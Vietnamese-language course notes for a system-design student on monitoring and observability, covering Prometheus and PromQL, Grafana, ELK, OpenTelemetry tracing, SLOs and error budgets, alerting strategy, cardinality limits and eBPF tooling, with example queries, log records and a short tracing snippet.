Tuần 13: Monitoring & Observability
“Một hệ thống production không có monitoring giống như lái máy bay trong đêm mà không có bảng điều khiển — bạn không biết mình đang bay ổn hay đang lao thẳng xuống đất.”
Tags: system-design monitoring observability prometheus grafana elk opentelemetry devops security Student: Hieu Prerequisite: Tuan-11-Microservices-Pattern · Tuan-12-CICD-Pipeline Liên quan: Tuan-02-Back-of-the-envelope · Tuan-05-Load-Balancer · Tuan-09-Rate-Limiter · Tuan-14-AuthN-AuthZ-Security · Tuan-15-Data-Security-Encryption
1. Context & Why
Analogy: Bảng điều khiển buồng lái máy bay (Cockpit Dashboard)
Hieu, tưởng tượng em là phi công đang lái một chiếc Boeing 777 chở 400 hành khách xuyên Thái Bình Dương. Trong buồng lái có hàng trăm đồng hồ và màn hình:
- Altimeter (cao độ) → tương đương latency — hệ thống đang phản hồi nhanh hay chậm?
- Airspeed indicator (tốc độ) → tương đương throughput/traffic — bao nhiêu request đang đi qua?
- Fuel gauge (nhiên liệu) → tương đương saturation — CPU/memory/disk còn bao nhiêu?
- Engine warning lights (đèn cảnh báo động cơ) → tương đương error rate — có gì đang hỏng không?
- Black box recorder (hộp đen) → tương đương logs & traces — khi sự cố xảy ra, em tìm nguyên nhân từ đâu?
- ATC communication (liên lạc kiểm soát không lưu) → tương đương alerting — ai thông báo cho em khi có vấn đề?
Không phi công nào bay mù (fly blind). Nếu tất cả đồng hồ tắt, quy trình bắt buộc là hạ cánh khẩn cấp. Tương tự, nếu hệ thống production không có monitoring, em đang “bay mù” — không biết khi nào sập, không biết tại sao sập, không biết sập ở đâu.
Tại sao Monitoring & Observability quan trọng?
| Không có Monitoring | Có Monitoring & Observability |
|---|---|
| Khách hàng báo lỗi → mới biết hệ thống sập | Alert lúc 3AM → on-call engineer fix trước khi user biết |
| ”Hệ thống chậm” — không biết chậm ở đâu | P99 latency tăng từ 50ms → 500ms tại service Payment |
| Debug bằng cách đọc code và đoán | Distributed trace cho thấy bottleneck ở DB query #47 |
| Capacity planning = “cảm giác” | Metrics cho thấy CPU sẽ chạm 90% trong 14 ngày |
| Postmortem = “chắc do deploy mới” | Log + trace + metrics = root cause analysis chính xác |
Monitoring vs Observability — Khác nhau thế nào?
| Monitoring | Observability | |
|---|---|---|
| Câu hỏi | ”Hệ thống có đang hoạt động không?" | "Tại sao hệ thống hoạt động như vậy?” |
| Approach | Known unknowns — biết trước cần theo dõi gì | Unknown unknowns — khám phá vấn đề chưa lường trước |
| Output | Dashboard, alerts | Khả năng drill-down, correlate, explore |
| Analogy | Đèn check engine trên xe | Kỹ sư cắm máy chẩn đoán OBD-II vào xe |
| Ví dụ | CPU > 90% → alert | ”Tại sao latency tăng 3x chỉ cho user ở VN vào lúc 9PM?” |
Monitoring là subset của Observability. Monitoring nói cho em biết cái gì hỏng. Observability giúp em hiểu tại sao nó hỏng — ngay cả khi em chưa từng gặp lỗi đó trước đây.
2. Deep Dive — Các khái niệm cốt lõi
2.1 Ba trụ cột của Observability (Three Pillars)
┌─────────────────────────────────────────────────┐
│ OBSERVABILITY │
│ │
│ ┌──────────┐ ┌──────────┐ ┌──────────────┐ │
│ │ METRICS │ │ LOGS │ │ TRACES │ │
│ │ │ │ │ │ │ │
│ │ "What" │ │ "Why" │ │ "Where" │ │
│ │ is │ │ did it │ │ did it │ │
│ │ happening│ │ happen │ │ happen │ │
│ └──────────┘ └──────────┘ └──────────────┘ │
│ │
│ Prometheus ELK Stack OpenTelemetry │
│ Grafana Fluentd Jaeger / Zipkin │
│ Datadog Loki │
└─────────────────────────────────────────────────┘
Pillar 1: Metrics (Số liệu đo lường)
Metrics là dữ liệu dạng số (numeric), biểu diễn trạng thái của hệ thống tại một thời điểm, được thu thập theo interval cố định.
| Metric Type | Mô tả | Ví dụ |
|---|---|---|
| Counter | Giá trị chỉ tăng, reset khi restart | http_requests_total, errors_total |
| Gauge | Giá trị tăng hoặc giảm | cpu_usage_percent, memory_used_bytes, active_connections |
| Histogram | Phân phối giá trị vào các bucket | http_request_duration_seconds (p50, p90, p99) |
| Summary | Tương tự histogram nhưng tính quantile phía client | go_gc_duration_seconds |
Khi nào dùng Histogram vs Summary?
- Histogram: Khi cần aggregate across instances (phổ biến hơn, dùng với Prometheus)
- Summary: Khi cần quantile chính xác trên single instance, không cần aggregate
Đặc điểm quan trọng của Metrics:
- Cheap to store: Mỗi data point chỉ ~16 bytes (timestamp + value)
- Fast to query: Time-series database tối ưu cho range queries
- Good for alerting: Dễ đặt threshold
- Nhược điểm: Không có context chi tiết (chỉ biết “error rate tăng”, không biết “error gì, ở đâu, cho user nào”)
Pillar 2: Logs (Nhật ký)
Logs là các event record rời rạc (discrete events), chứa thông tin chi tiết về điều gì đã xảy ra.
Ba dạng log phổ biến:
| Dạng | Ví dụ | Ưu điểm | Nhược điểm |
|---|---|---|---|
| Plaintext | 2024-01-15 10:30:45 ERROR Payment failed for user 123 | Dễ đọc cho người | Khó parse, khó search |
| Structured (JSON) | {"timestamp":"2024-01-15T10:30:45Z","level":"ERROR","service":"payment","user_id":"123","error":"insufficient_funds"} | Machine-parseable, filterable | Verbose hơn |
| Binary | Protobuf-encoded log | Compact, fast | Cần tool đặc biệt để đọc |
Best Practice: Luôn dùng Structured Logging (JSON). Lý do: khi hệ thống có 100 services, mỗi service 10K logs/second, em không thể grep plaintext. Em cần
jq, Elasticsearch, hay Loki để filterservice=payment AND level=ERROR AND user_id=123.
Structured Logging Fields chuẩn:
{
"timestamp": "2024-01-15T10:30:45.123Z",
"level": "ERROR",
"service": "payment-service",
"instance": "payment-7b4f9d8c-x2k9p",
"trace_id": "abc123def456",
"span_id": "span789",
"user_id": "usr_12345",
"method": "POST",
"path": "/api/v1/payments",
"status_code": 500,
"duration_ms": 2345,
"error": "database_connection_timeout",
"message": "Failed to process payment: connection pool exhausted"
}Pillar 3: Traces (Distributed Tracing)
Traces theo dõi một request khi nó đi qua nhiều services trong hệ thống phân tán (distributed system).
User Request (trace_id: abc-123)
│
├── [Span 1] API Gateway ─── 2ms
│ ├── [Span 2] Auth Service ─── 5ms
│ ├── [Span 3] Payment Service ─── 150ms ← Bottleneck!
│ │ ├── [Span 4] DB Query ─── 120ms ← Root cause!
│ │ └── [Span 5] Redis Cache ─── 1ms
│ └── [Span 6] Notification Svc ─── 10ms
│
Total: 168ms
Các khái niệm quan trọng:
| Term | Giải thích |
|---|---|
| Trace | Toàn bộ hành trình của 1 request qua hệ thống (gồm nhiều spans) |
| Span | Một operation đơn lẻ trong trace (ví dụ: 1 DB query, 1 HTTP call) |
| Trace ID | ID duy nhất identify toàn bộ trace, được propagate qua tất cả services |
| Span ID | ID duy nhất cho mỗi span |
| Parent Span ID | Span cha, tạo thành tree structure |
| Context Propagation | Cơ chế truyền trace_id/span_id giữa các services (thường qua HTTP headers) |
Context Propagation Headers:
traceparent: 00-abc123def456-span789-01
tracestate: vendor=value
W3C Trace Context là chuẩn (standard) được OpenTelemetry sử dụng. Trước đó mỗi vendor có format riêng (Zipkin dùng
X-B3-TraceId, Jaeger dùnguber-trace-id).
2.2 Prometheus Architecture — Hệ thống Metrics tiêu chuẩn
Prometheus là monitoring system open-source, được Cloud Native Computing Foundation (CNCF) graduated (cùng level với Kubernetes).
Kiến trúc tổng quan
┌──────────────────────────────────────────────────────────────┐
│ PROMETHEUS ECOSYSTEM │
│ │
│ ┌─────────────┐ PULL (scrape) ┌──────────────────┐ │
│ │ Target Apps │ ◄──────────────────── │ Prometheus │ │
│ │ /metrics │ every 15s │ Server │ │
│ │ │ │ │ │
│ │ - app:8080 │ │ ┌──────────────┐│ │
│ │ - node:9100 │ │ │ Retrieval ││ │
│ │ - mysql:9104│ │ │ (Scraper) ││ │
│ └─────────────┘ │ └──────┬───────┘│ │
│ │ │ │ │
│ ┌─────────────┐ │ ┌──────▼───────┐│ │
│ │ Service │ service discovery │ │ TSDB ││ │
│ │ Discovery │───────────────────────►│ │ (Time Series ││ │
│ │ │ │ │ Database) ││ │
│ │ - k8s API │ │ └──────┬───────┘│ │
│ │ - consul │ │ │ │ │
│ │ - DNS │ │ ┌──────▼───────┐│ │
│ │ - file_sd │ │ │ PromQL ││ │
│ └─────────────┘ │ │ (Query Lang) ││ │
│ │ └──────┬───────┘│ │
│ └────────┼────────┘ │
│ │ │
│ ┌───────────────────┬───────────────────┤ │
│ │ │ │ │
│ ┌──────▼──────┐ ┌──────▼──────┐ ┌───────▼───────┐ │
│ │ Grafana │ │ Alertmanager│ │ API Consumers │ │
│ │ (Dashboard) │ │ │ │ │ │
│ │ │ │ - Routing │ │ - Custom UI │ │
│ │ - Charts │ │ - Grouping │ │ - Scripts │ │
│ │ - Alerts │ │ - Silencing │ │ - CI/CD │ │
│ │ - Tables │ │ - Inhibit │ └───────────────┘ │
│ └─────────────┘ │ │ │
│ │ ┌─────────┐│ │
│ │ │PagerDuty││ │
│ │ │Slack ││ │
│ │ │Email ││ │
│ │ └─────────┘│ │
│ └─────────────┘ │
└──────────────────────────────────────────────────────────────┘
Pull-based Model (Tại sao Prometheus “kéo” thay vì “nhận”?)
| Pull (Prometheus) | Push (Datadog, InfluxDB) | |
|---|---|---|
| Cơ chế | Prometheus chủ động gọi tới /metrics endpoint | App chủ động gửi metrics tới collector |
| Ưu điểm | Dễ biết target còn sống (nếu scrape fail → target down); Không cần config phía app | App không cần biết collector ở đâu; Tốt cho short-lived jobs |
| Nhược điểm | Cần service discovery; Khó cho short-lived jobs | Khó phát hiện target chết; DDoS risk nếu nhiều app push cùng lúc |
| Giải pháp | Dùng Pushgateway cho batch/cron jobs | Rate limiting phía collector |
TSDB — Time Series Database
Prometheus lưu dữ liệu trong TSDB tự phát triển, tối ưu cho time-series data:
Cấu trúc data:
metric_name{label1="value1", label2="value2"} value timestamp
# Ví dụ:
http_requests_total{method="GET", path="/api/users", status="200"} 15234 1705312245
http_requests_total{method="POST", path="/api/orders", status="500"} 42 1705312245
node_cpu_seconds_total{cpu="0", mode="idle"} 98234.56 1705312245
TSDB Internal Structure:
data/
├── 01BKGV7JBM69T2G1BGBGM6KB12/ # Block (2h default)
│ ├── chunks/ # Compressed time-series data
│ │ └── 000001
│ ├── tombstones # Deleted data markers
│ ├── index # Inverted index (label → series)
│ └── meta.json # Block metadata
├── 01BKGTZQ1SYQJTR4PB43C8PD98/ # Another block
├── 01BKGTZQ1HHWHV8FBJXW1Y3W0K/
├── chunks_head/ # Current (in-memory) block
│ └── 000001
└── wal/ # Write-Ahead Log
├── 000000002
└── 000000003
- Block: Mỗi block chứa data của 2 giờ (default), immutable sau khi compact
- Compaction: Blocks cũ được merge để giảm I/O khi query
- WAL (Write-Ahead Log): Đảm bảo data không mất khi crash trước khi persist vào block
- Retention: Default 15 ngày, configurable
PromQL — Prometheus Query Language
PromQL là ngôn ngữ query mạnh mẽ cho time-series data. Đây là kỹ năng bắt buộc cho mọi DevOps/SRE engineer.
Các query quan trọng nhất:
# === INSTANT VECTOR (giá trị tại 1 thời điểm) ===
# Tổng request hiện tại
http_requests_total
# Filter bằng label
http_requests_total{method="GET", status=~"2.."}
# === RANGE VECTOR (giá trị trong khoảng thời gian) ===
# Request trong 5 phút gần nhất
http_requests_total[5m]
# === FUNCTIONS ===
# Rate: số request/giây trung bình trong 5 phút (quan trọng nhất!)
rate(http_requests_total[5m])
# QPS theo method
sum by (method) (rate(http_requests_total[5m]))
# Error rate (%)
sum(rate(http_requests_total{status=~"5.."}[5m]))
/
sum(rate(http_requests_total[5m]))
* 100
# P99 latency (từ histogram)
histogram_quantile(0.99,
sum by (le) (rate(http_request_duration_seconds_bucket[5m]))
)
# P50 (median) latency per service
histogram_quantile(0.50,
sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
)
# CPU usage (%)
100 - (avg by (instance) (rate(node_cpu_seconds_total{mode="idle"}[5m])) * 100)
# Memory usage (%)
(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100
# Disk sẽ đầy trong bao lâu (predictive)
predict_linear(node_filesystem_avail_bytes[7d], 30*24*3600)
# Top 5 endpoints theo QPS
topk(5, sum by (path) (rate(http_requests_total[5m])))
# Increase (tổng tăng trong khoảng thời gian — dùng cho counter)
increase(http_requests_total{status="500"}[1h])2.3 Grafana Dashboards
Grafana là nền tảng visualization tiêu chuẩn, hỗ trợ nhiều datasource (Prometheus, Elasticsearch, Loki, InfluxDB, CloudWatch…).
Dashboard tổ chức theo layers:
| Layer | Dashboard | Mục đích |
|---|---|---|
| Business | Revenue, Active Users, Conversion Rate | Stakeholder, Product Manager |
| Application | QPS, Latency, Error Rate, Saturation | Developers, SRE |
| Infrastructure | CPU, Memory, Disk, Network | SRE, DevOps |
| Database | Query latency, Connection pool, Replication lag | DBA, Backend |
| Network | Packet loss, Bandwidth, DNS resolution | Network Engineer |
2.4 ELK Stack — Centralized Logging
ELK = Elasticsearch + Logstash + Kibana (bây giờ thường gọi là Elastic Stack vì có thêm Beats).
┌──────────┐ ┌──────────┐ ┌───────────────┐ ┌──────────┐
│ Apps │ │ Beats │ │ Logstash │ │ Elastic │
│ │───►│(Filebeat)│───►│ │───►│ search │
│ stdout/ │ │ │ │ - Parse │ │ │
│ file log │ │ Lightwt │ │ - Transform │ │ Index & │
│ │ │ shipper │ │ - Enrich │ │ Search │
└──────────┘ └──────────┘ │ - Filter PII │ └────┬─────┘
└───────────────┘ │
┌─────▼─────┐
│ Kibana │
│ │
│ - Search │
│ - Visualize│
│ - Dashboard│
│ - Alerting │
└───────────┘
Mỗi component đóng vai trò gì?
| Component | Vai trò | Analogy |
|---|---|---|
| Beats (Filebeat) | Lightweight agent, đọc log files và forward | Bưu tá thu thư ở mỗi nhà |
| Logstash | Data processing pipeline: parse, transform, enrich, filter | Bưu điện phân loại thư |
| Elasticsearch | Distributed search & analytics engine, lưu trữ + index logs | Thư viện khổng lồ có catalog |
| Kibana | Web UI để search, visualize, tạo dashboard | Thủ thư giúp tìm sách |
Alternative nhẹ hơn: PLG Stack (Promtail + Loki + Grafana) — Grafana Loki thiết kế giống Prometheus nhưng cho logs, index chỉ labels (không full-text index như Elasticsearch), rẻ hơn nhiều về storage.
2.5 Distributed Tracing — OpenTelemetry, Jaeger, Zipkin
OpenTelemetry (OTel)
OpenTelemetry là chuẩn mở (open standard) cho observability, merge từ OpenTracing + OpenCensus. Đây là CNCF project, vendor-neutral.
Tại sao OTel quan trọng?
- Vendor lock-in elimination: Instrument 1 lần, export tới bất kỳ backend (Jaeger, Zipkin, Datadog, New Relic, Grafana Tempo…)
- Unified API: Một SDK cho cả Metrics + Logs + Traces
- Auto-instrumentation: Libraries cho hầu hết framework (Express, Flask, Spring Boot…)
- Industry standard: AWS, Google, Microsoft, Datadog đều support
┌─────────────────────────────────────────────────────────┐
│ OPENTELEMETRY ARCHITECTURE │
│ │
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
│ │ Service A│ │ Service B│ │ Service C│ │
│ │ (OTel │ │ (OTel │ │ (OTel │ │
│ │ SDK) │ │ SDK) │ │ SDK) │ │
│ └────┬─────┘ └────┬─────┘ └────┬─────┘ │
│ │ │ │ │
│ └──────────────┼──────────────┘ │
│ │ │
│ ┌───────▼────────┐ │
│ │ OTel Collector│ │
│ │ │ │
│ │ ┌────────────┐ │ │
│ │ │ Receivers │ │ OTLP, Jaeger, Zipkin │
│ │ └─────┬──────┘ │ │
│ │ ┌─────▼──────┐ │ │
│ │ │ Processors │ │ Batch, Filter, Sample │
│ │ └─────┬──────┘ │ │
│ │ ┌─────▼──────┐ │ │
│ │ │ Exporters │ │ Jaeger, Zipkin, OTLP │
│ │ └─────┬──────┘ │ │
│ └───────┼────────┘ │
│ │ │
│ ┌────────────┼────────────┐ │
│ │ │ │ │
│ ┌────▼───┐ ┌─────▼────┐ ┌───▼──────┐ │
│ │ Jaeger │ │ Grafana │ │ Datadog │ │
│ │ │ │ Tempo │ │ / others │ │
│ └────────┘ └──────────┘ └──────────┘ │
└─────────────────────────────────────────────────────────┘
Jaeger vs Zipkin
| Jaeger | Zipkin | |
|---|---|---|
| Tác giả | Uber (CNCF graduated) | Twitter (open-source) |
| Ngôn ngữ | Go | Java |
| Storage | Cassandra, Elasticsearch, Kafka, Badger | Cassandra, Elasticsearch, MySQL |
| UI | Richer, dependency graph | Simpler, lightweight |
| Sampling | Adaptive sampling (head + tail) | Fixed-rate sampling |
| Khi nào dùng | Production lớn, cần adaptive sampling | Setup nhanh, hệ thống nhỏ-trung |
2.6 SLO / SLA / SLI — Ngôn ngữ chung của Reliability
Ba khái niệm này là nền tảng của Site Reliability Engineering (SRE), được Google popularize.
| Term | Viết tắt của | Giải thích | Ví dụ |
|---|---|---|---|
| SLI | Service Level Indicator | Metric đo lường quality of service | Tỷ lệ request thành công: 99.95% |
| SLO | Service Level Objective | Mục tiêu nội bộ cho SLI | ”99.9% request phải trả về trong < 200ms” |
| SLA | Service Level Agreement | Hợp đồng với khách hàng, có hậu quả nếu vi phạm | ”Nếu uptime < 99.95%, khách được hoàn 10% phí” |
Quan hệ: SLI (đo) → SLO (mục tiêu nội bộ, chặt hơn SLA) → SLA (cam kết với khách hàng)
Ví dụ cụ thể cho một API service:
| SLI | SLO | SLA |
|---|---|---|
| Availability (% request success) | 99.95% trong 30 ngày | 99.9% — vi phạm thì credit 10% |
| Latency P99 | < 200ms | < 500ms — vi phạm thì credit 5% |
| Error rate | < 0.05% | < 0.1% — vi phạm thì credit 5% |
Error Budget — Ngân sách lỗi
Error Budget = lượng “lỗi cho phép” dựa trên SLO. Đây là khái niệm cực kỳ quan trọng vì nó biến reliability thành con số đo được.
Ví dụ: SLO = 99.9% availability trong 30 ngày
Error Budget Policy (chính sách khi ngân sách cạn):
| Error Budget remaining | Action |
|---|---|
| > 50% | Normal development, deploy freely |
| 25% – 50% | Tăng review, limit risky deploys |
| 5% – 25% | Feature freeze, focus stability |
| 0% (exhausted) | Code freeze — chỉ được fix bugs và improve reliability |
Aha Moment: Error budget tạo cân bằng giữa velocity (ship features nhanh) và reliability (hệ thống ổn định). Không còn tranh cãi “Dev muốn deploy, Ops muốn stable” — error budget là con số khách quan.
2.7 Golden Signals — 4 tín hiệu vàng (Google SRE Book)
Google đề xuất 4 metrics quan trọng nhất cần monitor cho mọi service:
| Signal | Giải thích | PromQL Example |
|---|---|---|
| Latency | Thời gian xử lý request (phân biệt success vs error latency) | histogram_quantile(0.99, sum by(le)(rate(http_request_duration_seconds_bucket[5m]))) |
| Traffic | Lượng demand (request/s, transactions/s) | sum(rate(http_requests_total[5m])) |
| Errors | Tỷ lệ request thất bại (explicit 5xx, implicit: wrong result) | sum(rate(http_requests_total{status=~"5.."}[5m])) / sum(rate(http_requests_total[5m])) |
| Saturation | Mức độ “đầy” của resource (CPU, memory, disk, connections) | (1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) |
Tại sao 4 signals này đủ? Vì chúng cover 4 câu hỏi: “Có chậm không?” (Latency), “Có nhiều không?” (Traffic), “Có lỗi không?” (Errors), “Có quá tải không?” (Saturation).
2.8 RED Method vs USE Method
Hai framework bổ sung cho Golden Signals, apply cho các loại component khác nhau:
RED Method (cho Services/Microservices — Tom Wilkie, Grafana Labs)
| Metric | Giải thích | Áp dụng |
|---|---|---|
| Rate | Requests per second | Mọi service |
| Errors | Failed requests per second | Mọi service |
| Duration | Distribution of request latency | Mọi service |
RED = Golden Signals trừ Saturation. Tập trung vào user experience.
USE Method (cho Resources/Infrastructure — Brendan Gregg, Netflix)
| Metric | Giải thích | Áp dụng |
|---|---|---|
| Utilization | % thời gian resource bận | CPU, Disk, Network |
| Saturation | Lượng work bị queued/pending | Queue depth, swap usage |
| Errors | Error events | Hardware errors, network drops |
USE áp dụng cho từng hardware resource: CPU, Memory, Disk I/O, Network I/O.
Khi nào dùng gì?
| Đối tượng | Dùng | Ví dụ |
|---|---|---|
| API endpoint | RED | /api/v1/payments — Rate, Errors, Duration |
| Kubernetes pod | USE | CPU utilization, memory saturation, OOM errors |
| Database | Cả hai | RED cho queries; USE cho disk I/O, connections |
| Message queue | USE | Queue depth (saturation), consumer lag, message errors |
2.9 Alerting Strategy — Chiến lược cảnh báo
Severity Levels
| Level | Khi nào | Response Time | Ai nhận | Kênh |
|---|---|---|---|---|
| P1 / Critical | Service down, data loss, security breach | < 5 phút | On-call engineer + manager | PagerDuty (phone call), SMS |
| P2 / High | Degraded performance, partial outage | < 30 phút | On-call engineer | PagerDuty, Slack incidents |
| P3 / Warning | Approaching threshold, non-critical error spike | < 4 giờ (business hours) | Team lead | Slack alerts |
| P4 / Info | Anomaly detected, capacity planning | Next business day | Team via weekly review | Email, dashboard |
Escalation Policy
Time 0 → On-call Primary receives alert
↓ (no ack in 5 min)
Time +5m → On-call Secondary receives alert
↓ (no ack in 10 min)
Time +15m → Engineering Manager receives alert
↓ (no ack in 15 min)
Time +30m → VP Engineering / CTO receives alert
↓ (auto-conference bridge opened)
Time +45m → Incident Commander declared, war room
Alerting Best Practices
| Do | Don’t |
|---|---|
| Alert on symptoms (user-facing: latency, errors) | Alert on causes (CPU high — might be fine during batch job) |
| Set alerts based on SLO burn rate | Set arbitrary thresholds without SLO context |
| Use multi-window alerting (5min AND 1hr) | Alert on single data point (noisy) |
| Include runbook link in alert | Send alert with no context or action |
| Page only for user-impacting issues | Page for every warning (alert fatigue) |
| Review and tune alerts monthly | Set and forget |
SLO-based Alerting (Google’s Burn Rate)
Thay vì alert “error rate > 1%”, dùng burn rate — tốc độ tiêu thụ error budget:
Ví dụ: SLO = 99.9%, observed error rate = 0.5%
→ Đang tiêu error budget nhanh gấp 5 lần cho phép. Nếu tiếp tục, error budget sẽ cạn trong = 6 ngày thay vì 30 ngày.
Multi-window alerting rules:
| Severity | Burn Rate | Short Window | Long Window | Alert After |
|---|---|---|---|---|
| P1 | 14.4x | 5 phút | 1 giờ | Tức thì — budget cạn trong 2 ngày |
| P2 | 6x | 30 phút | 6 giờ | Budget cạn trong 5 ngày |
| P3 | 1x | 6 giờ | 3 ngày | Budget đang tiêu đúng tốc độ cạn cuối tháng |
2.10 Cardinality Explosion Problem — Bẫy chết người
Cardinality = số lượng unique time series (unique combinations of metric name + label values).
Ví dụ an toàn:
http_requests_total{method="GET", status="200"} # method: ~5 values, status: ~10 values
# Cardinality = 5 × 10 = 50 series → OKVí dụ NGUY HIỂM:
http_requests_total{method="GET", user_id="usr_12345", request_id="req_abc"}
# user_id: 10M values, request_id: infinite
# Cardinality = 5 × 10M × ∞ = EXPLOSION 💥Tại sao cardinality explosion nguy hiểm?
| Hệ quả | Chi tiết |
|---|---|
| Memory OOM | Prometheus giữ tất cả active series trong RAM |
| Query timeout | PromQL query trên 10M series → CPU 100% |
| Disk explosion | Mỗi series ~16 bytes/sample × 4 samples/min × 10M series = 640M/min = 922GB/day |
| Billing shock | Nếu dùng managed service (Datadog, Grafana Cloud) → mỗi custom metric = $$$ |
Quy tắc vàng: KHÔNG BAO GIỜ dùng high-cardinality values làm label:
- User ID
- Request ID / Trace ID
- IP address
- URL path (nếu có path params:
/users/123→ vô hạn)
Thay vào đó: Dùng labels với bounded cardinality (method, status_code, service_name, region, pod_name). Nếu cần user-level data → dùng Logs hoặc Traces, không phải Metrics.
2.11 Modern Observability — High-Cardinality Structured Events
Cập nhật 2024-2026: Honeycomb-style “high-cardinality structured events” đang dần thay thế tách bạch Metrics + Logs + Traces cũ. Đây là quan điểm hiện đại được Charity Majors (CTO Honeycomb) và Liz Fong-Jones formalize trong sách “Observability Engineering” (O’Reilly 2022).
2.11.1 Vấn đề của 3-Pillars truyền thống
Section 2.1 trên mô tả 3 trụ cột Metrics + Logs + Traces. Nhưng trong production hiện đại, có 3 vấn đề lớn:
| Vấn đề | Chi tiết |
|---|---|
| Pre-aggregation kills detail | Metrics chỉ có aggregate (P99 = 200ms) — không biết WHO bị 200ms |
| Cardinality limits | Metrics không kham được user_id, request_id labels |
| 3 silos không correlate dễ | Metric tăng → tìm log → tìm trace = 3 tools, 3 query languages |
| ”Known unknowns” only | Phải biết trước cần monitor gì → “unknown unknowns” không thấy |
2.11.2 Giải pháp: High-Cardinality Structured Events
Quan điểm cốt lõi: Mỗi request emit 1 wide event với hàng trăm fields:
{
"timestamp": "2026-05-01T10:30:45.123Z",
"service": "checkout-api",
"instance": "checkout-7b4f9d8c-x2k9p",
"region": "us-east-1",
"trace_id": "abc123",
"span_id": "span789",
"user_id": "usr_12345",
"user_tier": "premium",
"user_country": "VN",
"session_id": "sess_xyz",
"request_method": "POST",
"request_path": "/api/v1/checkout",
"request_size_bytes": 2048,
"response_status": 200,
"response_size_bytes": 512,
"duration_ms": 234,
"db_query_count": 5,
"db_total_time_ms": 145,
"cache_hit": true,
"cache_lookup_count": 3,
"feature_flag_a": true,
"feature_flag_b": false,
"experiment_arm": "control",
"build_id": "v2.45.1",
"deploy_id": "deploy-abc",
"downstream_service": "payment-api",
"downstream_duration_ms": 89,
"downstream_retry_count": 1,
"error": null,
"error_message": null,
"warnings": ["slow_query"]
}Mỗi field là một dimension để slice/dice.
Tại sao tốt hơn:
- Có thể query: “P99 latency cho premium users tại VN với feature flag A bật, ở build v2.45.1, sau deploy gần đây”
- “Unknown unknowns” → drill-down dynamic, không cần predefine dashboard
- Single tool, single query language
2.11.3 So sánh: Metrics vs Structured Events
| Metrics (Prometheus) | Structured Events (Honeycomb-style) | |
|---|---|---|
| Storage cost/event | ~16 bytes (TSDB optimized) | ~1-5KB (full event) |
| Cardinality | Thấp (~10K series/host) | Vô tận (mỗi event độc lập) |
| Aggregation | Pre-aggregated (P99 over 1m bucket) | On-the-fly (compute từ events) |
| Drill-down | Limited (chỉ labels có sẵn) | Unlimited (mọi field) |
| Cost | Cheap | Đắt hơn (mỗi event lưu full) |
| Best for | High-volume, low-cardinality (CPU, network) | High-cardinality, business logic insight |
Lưu ý: Không phải thay thế hoàn toàn — complementary. Metrics vẫn cho infrastructure. Events cho application/business.
2.11.4 OpenTelemetry Span Events — Best of both
OpenTelemetry traces + span attributes có thể act như structured events. Mỗi span có thể attach unlimited attributes:
from opentelemetry import trace
tracer = trace.get_tracer(__name__)
@app.post("/checkout")
def checkout(user_id, items):
with tracer.start_as_current_span("checkout") as span:
# Set rich attributes (high-cardinality OK in traces)
span.set_attribute("user.id", user_id)
span.set_attribute("user.tier", get_user_tier(user_id))
span.set_attribute("user.country", get_user_country(user_id))
span.set_attribute("checkout.item_count", len(items))
span.set_attribute("checkout.total_amount", calculate_total(items))
span.set_attribute("feature.new_pricing", flag_enabled("new_pricing"))
span.set_attribute("deploy.version", os.getenv("APP_VERSION"))
# ... business logic
return resultSample rate: Trace data đắt hơn metrics → sample. Default: 1-10% sampling rate. Tail-based sampling: keep 100% errors + slow requests + 1% normal.
2.11.5 Vendors & tools
| Tool | Approach | Best for |
|---|---|---|
| Honeycomb | Native high-card events | Pioneer, best UX |
| Datadog APM | Metrics + Traces + Logs in 1 platform | Enterprise, full-stack |
| New Relic | Same | Established |
| Grafana Tempo + Loki | OSS traces + logs | Self-hosted, cost-conscious |
| Lightstep / ServiceNow | Microservice deep dive | Microservice-heavy |
| OpenTelemetry + ClickHouse | DIY | Maximum flexibility |
Tham chiếu:
- Observability Engineering (Charity Majors, Liz Fong-Jones, George Miranda, O’Reilly 2022) — https://www.honeycomb.io/observability-engineering-oreilly-book
- Charity Majors blog: https://charity.wtf/
2.12 eBPF Observability — Kernel-level Visibility
Cập nhật 2024-2026: eBPF-based observability (Pixie, Cilium Hubble, Parca) cung cấp visibility ở mức kernel mà không cần instrument application code.
2.12.1 Vấn đề của instrumentation truyền thống
Application-level instrumentation (OpenTelemetry SDK, Datadog agent):
- Phải modify code (add SDK, decorators, middleware)
- Language-specific: Python SDK ≠ Go SDK ≠ Rust SDK
- Performance overhead: 1-10% CPU, depends on sampling
- Doesn’t see kernel/network internals: TCP retransmits, syscall delays, scheduler latency
2.12.2 eBPF — Observability Without Code Changes
eBPF programs chạy trong kernel, observe mọi syscall, network packet, function call. Không cần modify application.
┌──────────────────────────────┐
│ Application (no SDK needed) │
│ user-space syscall │
└─────────────┬────────────────┘
│
▼
┌──────────────────────────────┐
│ Linux Kernel │
│ ┌────────────────────────┐ │
│ │ eBPF probes attached │ │
│ │ - kprobes (kernel fn) │ │
│ │ - uprobes (user fn) │ │
│ │ - tracepoints │ │
│ │ - XDP (network) │ │
│ └─────────┬──────────────┘ │
└────────────┼─────────────────┘
│ ring buffer
▼
┌──────────────────────────────┐
│ User-space collector │
│ → Send to backend │
└──────────────────────────────┘
Ưu điểm:
| Lợi ích | Chi tiết |
|---|---|
| Zero code changes | Deploy DaemonSet, instant visibility cho mọi pod |
| Language-agnostic | Works cho Python, Go, Rust, Java, C++, anything |
| Kernel + network visibility | TCP retransmits, syscall latency, page faults — invisible từ app |
| Low overhead | < 1% CPU typical |
| Production-safe | Verifier ensure no infinite loops, no kernel panic |
Nhược điểm:
| Hạn chế | Chi tiết |
|---|---|
| Linux-only | Không chạy trên Windows/Mac (servers OK) |
| Kernel version requirement | eBPF features cần kernel 4.18+ (CO-RE: 5.5+) |
| Privileged | Cần CAP_BPF hoặc privileged container |
| Symbol resolution | Stripped binary → kernel không biết function name |
2.12.3 eBPF Tools
| Tool | Use case | URL |
|---|---|---|
| Pixie (CNCF) | Auto-instrument Kubernetes apps | https://px.dev/ |
| Cilium Hubble | Network observability | https://docs.cilium.io/en/stable/gettingstarted/hubble/ |
| Parca | Continuous profiling | https://www.parca.dev/ |
| Pyroscope | Profiling | https://pyroscope.io/ |
| bcc tools | CLI tools (e.g., tcpconnect, biolatency) | https://github.com/iovisor/bcc |
| bpftrace | DTrace-like for eBPF | https://github.com/iovisor/bpftrace |
2.12.4 Ví dụ thực tế: Pixie auto-tracing
